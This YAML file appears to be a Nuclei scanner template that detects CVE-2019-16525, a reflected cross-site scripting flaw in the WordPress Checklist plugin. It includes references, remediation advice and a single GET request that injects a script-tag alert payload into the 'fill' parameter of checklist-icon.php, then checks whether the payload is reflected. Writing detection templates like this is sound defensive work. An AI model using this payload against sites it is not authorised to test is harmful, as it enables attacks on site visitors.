51 lines
1.8 KiB
YAML
51 lines
1.8 KiB
YAML
id: CVE-2019-16525
|
|
|
|
info:
|
|
name: WordPress Checklist <1.1.9 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file.
|
|
remediation: |
|
|
Update to the latest version of the WordPress Checklist plugin (1.1.9 or higher) to mitigate this vulnerability.
|
|
reference:
|
|
- https://wordpress.org/plugins/checklist/#developers
|
|
- https://packetstormsecurity.com/files/154436/WordPress-Checklist-1.1.5-Cross-Site-Scripting.html
|
|
- https://plugins.trac.wordpress.org/changeset/2155029/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-16525
|
|
- https://wpvulndb.com/vulnerabilities/9877
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2019-16525
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00323
|
|
epss-percentile: 0.67467
|
|
cpe: cpe:2.3:a:checklist:checklist:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: checklist
|
|
product: checklist
|
|
framework: wordpress
|
|
tags: xss,wp-plugin,packetstorm,cve,cve2019,wordpress,checklist
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100968fec8663fbdf33cd38e4d06bfcd37fb6a216e4a4c6b08588b0a250fc9a328a0220185fdc247e9ecd3f2cbe98e66b1e552d16839cd21491d831b203fa1d98ed1dde:922c64590222798bb761d5b6d8e72950 |